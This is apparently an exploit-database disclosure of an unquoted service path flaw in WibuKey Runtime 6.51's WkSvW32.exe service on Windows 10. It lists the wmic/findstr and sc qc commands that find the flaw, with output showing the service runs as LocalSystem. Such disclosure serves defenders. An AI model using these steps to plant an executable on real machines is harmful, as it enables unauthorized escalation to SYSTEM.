32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
# Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
|
|
# Discovery by: Brian Rodriguez
|
|
# Date: 13-06-2021
|
|
# Vendor Homepage: https://www.wibu.com
|
|
# Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html
|
|
# Tested Version: 6.51
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on: Windows 10 Enterprise
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|
|
|findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
WIBU-KEY Server
|
|
WkSvW32.exe C:\PROGRAM FILES
|
|
(X86)\WIBUKEY\SERVER\WkSvW32.exe
|
|
Auto
|
|
|
|
C:\Users\IEUser>sc qc WkSvW32.exe
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: WkSvW32.exe
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\PROGRAM FILES
|
|
(X86)\WIBUKEY\SERVER\WkSvW32.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : WIBU-KEY Server
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem |